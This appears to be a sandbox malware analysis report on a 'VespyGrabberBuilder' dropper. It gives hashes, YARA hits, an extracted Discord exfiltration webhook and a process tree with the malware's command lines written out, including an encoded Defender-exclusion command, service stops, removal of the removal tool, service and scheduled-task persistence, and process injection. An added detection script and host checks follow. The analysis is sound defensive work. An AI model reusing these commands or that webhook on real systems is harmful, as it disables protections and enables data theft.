Analysis
  max time kernel: 1799s
  max time network: 1792s
  platform: windows7_x64
  resource: win7-20240215-en
  resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  submitted: 22/02/2024, 20:33
Static task: static1
Behavioral task: behavioral1
  Sample: VespyGrabberBuilder.exe
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: VespyGrabberBuilder.exe
  Resource: win10v2004-20240221-en
(The signatures, process tree and downloads below are from behavioral1, the Windows 7 run.)
General
  Target: VespyGrabberBuilder.exe
  Size: 12.6MB
  MD5: fab385fb154644665f94aca9424fb0ce
  SHA1: 8dc525108cebd97b3127129cc1633a7f31010424
  SHA256: c08b63c50a78ca119a5ff4fe10592a0f66289708df38349e91e645214aae7576
  SHA512: 07def38b8590ebaa95d7213e77e3892f60f10a87cef797fa07c6feb033f08d4148024360c7c32b5f92441c41236b8a86e66cee59bb51d6fbde97b86923a640e3
  SSDEEP: 393216:NayDfg/3Y8G6jgVINcfwt+F2CZZiLe2Wq:wyDfYPwPwtO2Mie2J
Malware Config
  Extracted family: growtopia
  Discord webhook: https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures

Detect ZGRat V1 (34 IoCs)
  YARA rule family_zgrat_v1 hit 34 memory dumps of PID 2844 (Ilkdt.exe) in behavioral1, all taken from the same base address 0x003A0000:
    behavioral1/memory/2844-61-0x00000000003A0000-0x000000000040C000-memory.dmp
    behavioral1/memory/2844-N-0x00000000003A0000-0x0000000000405000-memory.dmp
      for N in 68, 69, 71, 73, 75, 77, 79, 81, 83, 85, 87, 89, 91, 93, 95, 97, 99, 101, 103, 105, 107, 109, 111, 113, 115, 117, 119, 121, 123, 125, 127, 129, 131 (33 dumps)
Creates new service(s) (1 TTP)

Stops running service(s) (3 TTPs)
Executes dropped EXE (9 IoCs)
  pid   process
  2844  Ilkdt.exe
  2624  WinHostMgr.exe
  2548  WinErrorMgr.exe
  2636  Sahyui1337.exe
  2652  KeyGeneratorTOP.exe
  2412  KeyGeneratorTOP.exe
  2792  WinErrorMgr.exe
  480   Process not Found
  1648  bauwrdgwodhv.exe

Loads dropped DLL (11 IoCs)
  pid   process
  2824  VespyGrabberBuilder.exe (6 hits)
  2444  Process not Found
  2652  KeyGeneratorTOP.exe
  2412  KeyGeneratorTOP.exe
  2548  WinErrorMgr.exe
  480   Process not Found
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
  flow  ioc
  8     pastebin.com
  9     pastebin.com
  2     discord.com
  3     discord.com

Drops file in System32 directory (4 IoCs)
  File opened for modification  C:\Windows\system32\MRT.exe  (bauwrdgwodhv.exe)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  (powershell.exe)
  File opened for modification  C:\Windows\system32\MRT.exe  (WinHostMgr.exe)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  (powershell.exe)

Suspicious use of SetThreadContext (2 IoCs)
  PID 1648 (bauwrdgwodhv.exe) set thread context of PID 2460 (conhost.exe, target index 81)
  PID 1648 (bauwrdgwodhv.exe) set thread context of PID 1784 (explorer.exe, target index 89)

Drops file in Windows directory (2 IoCs)
  File created  C:\Windows\wusa.lock  (wusa.exe, twice: once per wusa /uninstall run)
Launches sc.exe (14 IoCs)
  sc.exe is the built-in Windows utility for controlling services. Here it is used to stop the Windows Update related services (UsoSvc, WaaSMedicSvc, bits, wuauserv, dosvc) and the event log service, and to delete, create and start the GMDTJRUT service (see the process tree).
  pids: 920, 1624, 2596, 2644, 684, 3048, 2076, 2160, 2660, 2576, 2516, 112, 928, 2084 (all sc.exe)
Detects Pyinstaller (5 IoCs)
  YARA rule pyinstaller matched the dropped files behavioral1/files/0x0007000000015d4c-N.dat for N in 32, 34, 37, 38, 51.
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTP, 1 IoC)
  schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 1200  schtasks.exe
Modifies data under HKEY_USERS (6 IoCs)
  Key created      \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  (powershell.exe)
  Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a88c84ce65da01  (powershell.exe)
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT  (explorer.exe)
  Key created      \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates  (explorer.exe)
  Key created      \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs  (explorer.exe)
  Key created      \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs  (explorer.exe)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   process            hits
  2216  powershell.exe     1
  2636  Sahyui1337.exe     2
  2624  WinHostMgr.exe     15
  2348  powershell.exe     1
  1648  bauwrdgwodhv.exe   13
  2220  powershell.exe     1
  1784  explorer.exe       31
Suspicious use of AdjustPrivilegeToken (14 IoCs)
  SeDebugPrivilege       2216  powershell.exe
  SeDebugPrivilege       2844  Ilkdt.exe
  SeDebugPrivilege       2636  Sahyui1337.exe
  SeDebugPrivilege       2348  powershell.exe
  SeShutdownPrivilege    2144  powercfg.exe
  SeShutdownPrivilege    2236  powercfg.exe
  SeShutdownPrivilege    1016  powercfg.exe
  SeShutdownPrivilege    2108  powercfg.exe
  SeDebugPrivilege       2220  powershell.exe
  SeShutdownPrivilege    2472  powercfg.exe
  SeShutdownPrivilege    2420  powercfg.exe
  SeShutdownPrivilege    2840  powercfg.exe
  SeShutdownPrivilege    1992  powercfg.exe
  SeLockMemoryPrivilege  1784  explorer.exe
Suspicious use of WriteProcessMemory (55 IoCs)
  writer (pid, process)          target pid  target index  writes
  2824  VespyGrabberBuilder.exe  2216        28            4
  2824  VespyGrabberBuilder.exe  2844        30            4
  2824  VespyGrabberBuilder.exe  2624        31            4
  2824  VespyGrabberBuilder.exe  2548        32            4
  2824  VespyGrabberBuilder.exe  2636        33            4
  2824  VespyGrabberBuilder.exe  2652        34            4
  2652  KeyGeneratorTOP.exe      2412        36            3
  2548  WinErrorMgr.exe          2792        37            4
  2792  WinErrorMgr.exe          1200        38            4
  856   cmd.exe                  2396        49            3
  2312  cmd.exe                  2612        94            3
  1648  bauwrdgwodhv.exe         2460        81            9
  1648  bauwrdgwodhv.exe         1784        89            5
  (Parent-to-child writes at process start are normal; the nine writes from bauwrdgwodhv.exe into conhost.exe and five into explorer.exe, paired with the SetThreadContext calls above, are the injection.)
Processes
(indented by depth in the process tree; "flags" are the signatures tria.ge attached to that process)

PID 2824  C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe"
  flags: Loads dropped DLL; Suspicious use of WriteProcessMemory

  PID 2216  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcgB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAZAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAYgBxACMAPgA="
    decoded (UTF-16LE base64): <#rrw#>Add-MpPreference <#qdy#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ntp#> -Force <#ibq#>
      The <#...#> block comments are padding; the effective command excludes the user profile and the entire system drive from Defender scanning.
      The image path is SysWOW64 although the command line names System32: the parent is 32-bit, so file-system redirection resolved the call to the 32-bit PowerShell.
    flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  PID 2844  C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
    flags: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken (the ZGRat V1 YARA hits above are on this process)

  PID 2624  C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
    flags: Executes dropped EXE; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses

    PID 2348  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      flags: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    PID 112   C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop UsoSvc
      flags: Launches sc.exe

    PID 856   C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      flags: Suspicious use of WriteProcessMemory

      PID 2396  C:\Windows\system32\wusa.exe
        cmdline: wusa /uninstall /kb:890830 /quiet /norestart
        flags: Drops file in Windows directory

    PID 928   C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      flags: Launches sc.exe

    PID 2644  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop bits
      flags: Launches sc.exe

    PID 2084  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop wuauserv
      flags: Launches sc.exe

    PID 2076  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop dosvc
      flags: Launches sc.exe

    PID 684   C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe delete "GMDTJRUT"
      flags: Launches sc.exe

    PID 1016  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      flags: Suspicious use of AdjustPrivilegeToken

    PID 2108  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      flags: Suspicious use of AdjustPrivilegeToken

    PID 2144  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      flags: Suspicious use of AdjustPrivilegeToken

    PID 2236  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      flags: Suspicious use of AdjustPrivilegeToken

    PID 920   C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"
      flags: Launches sc.exe

    PID 2160  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe start "GMDTJRUT"
      flags: Launches sc.exe

    PID 3048  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop eventlog
      flags: Launches sc.exe

  PID 2548  C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
    flags: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

    PID 2792  C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"
      flags: Executes dropped EXE; Suspicious use of WriteProcessMemory

      PID 1200  C:\Windows\SysWOW64\schtasks.exe
        cmdline: "schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA351.tmp" /F
        flags: Creates scheduled task(s)

  PID 2636  C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"
    flags: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  PID 2652  C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
    flags: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory

    PID 2412  C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"
      flags: Executes dropped EXE; Loads dropped DLL

PID 2220  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (shown as a root; no parent recorded in the tree)
  cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  flags: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

PID 1648  C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe  (the binary registered as service GMDTJRUT above)
  cmdline: C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe
  flags: Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

  PID 1624  C:\Windows\system32\sc.exe
    cmdline: C:\Windows\system32\sc.exe stop UsoSvc
    flags: Launches sc.exe

  PID 2460  C:\Windows\system32\conhost.exe
    cmdline: C:\Windows\system32\conhost.exe
    flags: none (target of SetThreadContext and nine WriteProcessMemory calls from PID 1648)

  PID 2420  C:\Windows\system32\powercfg.exe
    cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    flags: Suspicious use of AdjustPrivilegeToken

  PID 1992  C:\Windows\system32\powercfg.exe
    cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    flags: Suspicious use of AdjustPrivilegeToken

  PID 2840  C:\Windows\system32\powercfg.exe
    cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    flags: Suspicious use of AdjustPrivilegeToken

  PID 2472  C:\Windows\system32\powercfg.exe
    cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    flags: Suspicious use of AdjustPrivilegeToken

  PID 2660  C:\Windows\system32\sc.exe
    cmdline: C:\Windows\system32\sc.exe stop dosvc
    flags: Launches sc.exe

  PID 1784  C:\Windows\explorer.exe
    cmdline: explorer.exe
    flags: Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken (SeLockMemoryPrivilege); target of SetThreadContext and five WriteProcessMemory calls from PID 1648

  PID 2576  C:\Windows\system32\sc.exe
    cmdline: C:\Windows\system32\sc.exe stop bits
    flags: Launches sc.exe

  PID 2596  C:\Windows\system32\sc.exe
    cmdline: C:\Windows\system32\sc.exe stop wuauserv
    flags: Launches sc.exe

  PID 2516  C:\Windows\system32\sc.exe
    cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    flags: Launches sc.exe

  PID 2312  C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    flags: Suspicious use of WriteProcessMemory

PID 2612  C:\Windows\system32\wusa.exe  (shown as a root; the WriteProcessMemory records list it as the child of cmd.exe PID 2312)
  cmdline: wusa /uninstall /kb:890830 /quiet /norestart
  flags: Drops file in Windows directory

Reading the tree
  VespyGrabberBuilder.exe drops and runs five payloads (Ilkdt.exe, WinHostMgr.exe, WinErrorMgr.exe, Sahyui1337.exe, KeyGeneratorTOP.exe) after first adding Defender exclusions for the user profile and the whole system drive through an obfuscated -EncodedCommand. Ilkdt.exe is the process the ZGRat V1 YARA rule fires on. WinHostMgr.exe is a loader that repeats the Defender exclusion (this time also excluding every .exe), stops the Windows Update services (UsoSvc, WaaSMedicSvc, bits, wuauserv, dosvc), uninstalls KB890830 (the Malicious Software Removal Tool; MRT.exe is also opened for modification), disables standby and hibernate timeouts, registers C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe as the auto-start service GMDTJRUT, starts it, and stops the event log service. The service binary bauwrdgwodhv.exe then runs the same service/powercfg/wusa sequence and injects into conhost.exe and explorer.exe via WriteProcessMemory and SetThreadContext; the injected explorer.exe acquires SeLockMemoryPrivilege, the privilege needed for large-page allocations. That combination is consistent with a coin-miner payload, although the report does not name one. WinErrorMgr.exe copies itself to %TEMP%\XenoManager\ and persists through the scheduled task WindowsErrorHandler created from an XML file. The run also contacts pastebin.com and discord.com, and the extracted growtopia config carries a Discord webhook.

  Checks on a suspected host: Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension (exclusions for the profile, ProgramData, the system drive or *.exe are the tell); sc qc GMDTJRUT; schtasks /Query /TN WindowsErrorHandler /V; Get-Service UsoSvc, WaaSMedicSvc, bits, wuauserv, dosvc, eventlog; and the presence of C:\ProgramData\vcnwldzucnvl\ and %TEMP%\XenoManager\.
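The process tree carries two Defender-exclusion commands, one in clear text and one hidden behind -EncodedCommand with junk <#...#> comments, plus the service-stop, powercfg, wusa, sc create and schtasks commands. The following is an added example (it is not part of the tria.ge report and not the sample's own code) showing how a detection pipeline should normalise such command lines before matching: it decodes the UTF-16LE base64 blob from PID 2216, strips the comment padding, matches every command line against a small rule set, and flags a process tree root once several distinct behaviours hang off it. The PIDs and command lines are copied from the report (a subset, with parent links taken from the tree depth); the rule names, the ATT&CK mapping and the threshold of three rules are this example's own choices.

```python
import base64
import binascii
import re

# Constructed input: the -EncodedCommand blob shown under PID 2216 in the report.
ENCODED = (
    "PAAjAHIAcgB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAZAB5ACMAPgAgAC0A"
    "RQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA"
    "JABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdABwACMAPgAgAC0ARgBvAHIAYwBlACAA"
    "PAAjAGkAYgBxACMAPgA="
)

# Constructed input: (pid, parent pid, command line) copied from the report's process
# tree (subset). Parent links follow the tree depth; parent 0 marks a tree root.
TREE = [
    (2824, 0, r'"C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe"'),
    (2216, 2824, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENCODED + '"'),
    (2624, 2824, r'"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"'),
    (2348, 2624, r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (112, 2624, r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (856, 2624, r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (1016, 2624, r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (920, 2624, r'C:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"'),
    (3048, 2624, r"C:\Windows\system32\sc.exe stop eventlog"),
    (2548, 2824, r'"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"'),
    (2792, 2548, r'"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"'),
    (1200, 2792, r'"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA351.tmp" /F'),
    (1648, 0, r"C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe"),
    (1624, 1648, r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (2420, 1648, r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (2312, 1648, r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (2612, 0, r"wusa /uninstall /kb:890830 /quiet /norestart"),
]

# powershell.exe accepts -e, -ec and any longer prefix of -EncodedCommand.
ENCODED_RE = re.compile(r'-(?:e|ec|en\w*)\s+"?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)

# (rule name, ATT&CK technique where the mapping is unambiguous, pattern)
RULES = [
    ("defender_exclusion", "T1562.001", re.compile(r"add-mppreference.*-exclusion", re.I)),
    ("stop_update_services", "T1489", re.compile(r"\bsc(?:\.exe)?\s+stop\s+(?:usosvc|waasmedicsvc|wuauserv|bits|dosvc)\b", re.I)),
    ("stop_eventlog", "T1562.002", re.compile(r"\bsc(?:\.exe)?\s+stop\s+eventlog\b", re.I)),
    ("disable_sleep", None, re.compile(r"powercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I)),
    ("remove_msrt", "T1562.001", re.compile(r"wusa\s+/uninstall\s+/kb:890830", re.I)),
    ("service_persistence", "T1543.003", re.compile(r"\bsc(?:\.exe)?\s+create\s+.*binpath=", re.I)),
    ("schtask_from_xml", "T1053.005", re.compile(r'schtasks(?:\.exe)?"?\s+/create\s+.*/xml\b', re.I)),
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def strip_comment_junk(script):
    """Drop <# ... #> block comments used as padding and collapse the whitespace left behind."""
    return " ".join(COMMENT_RE.sub(" ", script).split())


def normalize(cmdline):
    """Command line as the rules should see it: decoded and de-padded when it was encoded."""
    decoded = decode_encoded_command(cmdline)
    return strip_comment_junk(decoded) if decoded else cmdline


def scan(tree, decode=True):
    """Map each rule name to the PIDs whose (normalised) command line matches it."""
    hits = {name: [] for name, _, _ in RULES}
    for pid, _, cmdline in tree:
        text = normalize(cmdline) if decode else cmdline
        for name, _, rx in RULES:
            if rx.search(text):
                hits[name].append(pid)
    return hits


def root_of(pid, tree):
    """Walk parent links up to the process tree root (parent 0)."""
    parents = {p: pp for p, pp, _ in tree}
    while parents.get(pid, 0):
        pid = parents[pid]
    return pid


def verdict(tree, min_rules=3):
    """Group rule hits by tree root; roots with at least min_rules distinct behaviours are flagged.
    A single sc stop or powercfg call is ordinary admin activity; the combination is the signal."""
    per_root = {}
    for name, pids in scan(tree).items():
        for pid in pids:
            per_root.setdefault(root_of(pid, tree), set()).add(name)
    return {root: sorted(names) for root, names in per_root.items() if len(names) >= min_rules}


if __name__ == "__main__":
    print("PID 2216 decodes to:", normalize(TREE[1][2]))
    for root, names in verdict(TREE).items():
        print(f"root PID {root}: {', '.join(names)}")
```

Running it flags roots 2824 (all seven behaviours) and 1648 (three), while the lone wusa.exe root 2612 stays below the threshold. Note that with decode=False the encoded Add-MpPreference under PID 2216 is missed entirely, which is the reason to decode before matching.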
Network
MITRE ATT&CK Enterprise v15
Downloads (files written during the run; no filename recorded unless shown)

  Filesize: 1.2MB
  MD5: a4720f9a650d9b0098751a9b7063c375
  SHA1: 8eef2b8988d785775161b38f95314863b27b144d
  SHA256: 6d2f6866ef34265b0c60542955986ba206b1bbb45db5f04c5584d01869573807
  SHA512: fa3f56925cd5254530076a9947e3f21b70518da2cfc521db4b04eaa98842aba357c056b3818c5c06fa16fa9955b32857d6a4ba9546a09b6ff1062f998c82d953

  Filesize: 4.3MB
  MD5: 749e16da9a2c38ef736e33db18a6e09b
  SHA1: 2957f352a54c27de463e22f60b07ecc14ae78ffe
  SHA256: 3bb3995012fcd488b7a502d829fc6a2ec82067192fe9900cef1bf4224fbe1857
  SHA512: 8f83be4470330f71bc45f35aa26d37ef465fb7da3efeef2222b9ba62dba72f9129680dfaeb474e3710c9ecdcc7e5e3dbe3fbcd542a345ad00c094b38c51c525a

  Filesize: 6.2MB
  MD5: c4ae46e22416bc88411d50dbd9856ab1
  SHA1: 06fd01ac84b5f566c0493fd9f090fdb2e030f6ed
  SHA256: 754076b4f4b74bfa84fc8260144e2008587e3fdebe45f5dbcda0e862e593fc8c
  SHA512: 8dbe56eb608ec270d346dabf79ca64ab41bd596a8fbf17c6c2d13d9f58f5b30ee269ffd3ef605f0094d13d636da52f317039ea64bd810210469a8097398b8d0f

  Filesize: 5.4MB
  MD5: 825026f2b287ed6034a6145f2061eb8e
  SHA1: 1a03ac4615efb77e2f01ab53840f543a70a996bb
  SHA256: d50dae1f4d27e37a034f086bd19e196e63ee11caab5e2628164f40d3db16670d
  SHA512: f28aa13d0ee9604f80aaf3fb2f9faa2333f6bcf68a3cecd44f61cd674437fbc18467a993d398390456c050f5a1072a7c85dd5ab798bb2a2367a0bbddeba6a069

  Filesize: 1.8MB
  MD5: f06223258558d32b15057b6d51702ffc
  SHA1: cf29bfea585fc30f5f2a03ea924cd55dad02aa10
  SHA256: 26c35afa0783fcbcea457f042b6a65df3870c0321a674a96f5b9079509ed254d
  SHA512: ba4ed45afb9bbf034e261ef0cbbe41c97da7d607b0f4c78e914e79c053c1b179392d4890d1de25c8ad0fb7339f643e85214711815afd061c5bfece5a12b9401e

  Filesize: 5.4MB
  MD5: dd27aff358d633af67d1a20624038c6a
  SHA1: a830d0f2bcfd3180a657ac4db8c790c8dfb0b3b5
  SHA256: 6ded9b5fd0d8379f715700960a7ddfdf7ceb67019059103b9405f5bdac057156
  SHA512: b81d0dc19e24f5811760109c2dffde3418941f94cb735d07c970ef39345d9d79fe3d5e7ab01792ea1af0b6d599a57050c5ab54f8837eaaae61eceffa531b05a0

  Filesize: 1KB
  MD5: 7f673f709ab0e7278e38f0fd8e745cd4
  SHA1: ac504108a274b7051e3b477bcd51c9d1a4a01c2c
  SHA256: da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
  SHA512: e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132

  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0HYUVDUZQBUXLV8BLDEK.temp
  Filesize: 7KB
  MD5: e13ea1da6b850fee339fe83314b89adf
  SHA1: dddc76defbcb2490b0e6995ba47ad104d089f673
  SHA256: 55c7f1a2324b13861174900597e3761dea5751bb38dce6732655ccef63b48fc7
  SHA512: 21be8bc9ac8ef3a66a55db132e5e5ad4e67610f38cc6cbfa4883163c2d1270f946ac8d4cceab152250c29df63f7398ef49a212d4c3f7bc4b7ced50f23a0320af

  Filesize: 1.9MB
  MD5: 196543b959d0f41f8ffbbfafdce5f072
  SHA1: a5969a292fc5accb64dd13983f0e2ebfdfb61781
  SHA256: 5ff9c4e4b7397f6b59b8d3268c5e8ec5d99fbda1702cc143c1e75843fa986381
  SHA512: 2b47417ed55b4582e2d76cf46727d8578dbfe4ad6a0c56d84a2d72d8e0d47ecd8cc1437e69a74626c3ee3def3209a9a37d450a5867c27b5a1e5130862f6aa4fc

  Filesize: 191KB
  MD5: e004a568b841c74855f1a8a5d43096c7
  SHA1: b90fd74593ae9b5a48cb165b6d7602507e1aeca4
  SHA256: d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
  SHA512: 402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af

  Filesize: 4.9MB
  MD5: c108564c8fe1e2d5b11615b17c1f47d6
  SHA1: 315a4fd5ffdb581d06c66d33f2a1964c3cad61d3
  SHA256: a3dfed0a83fd712ebd1081da4c9f2fa789cce3cd1c7e53bf9dc7ffde4ff77137
  SHA512: 4a2ccff555a1b9e64c105c741cb1b8c1e740db4d6fc2d6c1f7802c22f28fecf4cc03564e985e229df68d2eec781932e4ee1529c71985db0e661da1fda32996d8

  Filesize: 6.1MB
  MD5: 7799ba27987e123073807bb846e77820
  SHA1: 76635297c39d55304dfe71ecb315cb5c7f3c01f9
  SHA256: b509f009cae3603578ca187ac24f9dd0bbfcf9c3d19a78b058580b2dc255b659
  SHA512: 6dbc2aba73cb9b27415a3b026623003db8bae5b88d1c5f7cf35857c6dea68469b15b93c9dfc0e1b65e033d8c78772f018de3149c80edbe5756c2b12c3857014b

  Filesize: 316KB
  MD5: 675d9e9ab252981f2f919cf914d9681d
  SHA1: 7485f5c9da283475136df7fa8b62756efbb5dd17
  SHA256: 0f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
  SHA512: 9dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb

  Filesize: 42KB
  MD5: d499e979a50c958f1a67f0e2a28af43d
  SHA1: 1e5fa0824554c31f19ce01a51edb9bed86f67cf0
